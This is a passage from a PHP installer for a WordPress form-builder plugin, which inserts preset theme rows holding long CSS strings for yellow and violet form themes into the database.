84%, #165ba9 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #CCCCCC;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\nfont-size: 13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 02 yellow\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EADEB4;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #CFAB1A;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #A08104;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #CFAB1A;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #A08104;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E2DED7;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #ECBD00;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #ECBD00 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #ECBD00 ), color-stop(49%, #F5C403 ), color-stop(84%, #F8C90B ), color-stop(99%, #FFCC00 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 02 violet\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #C9ADEF;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 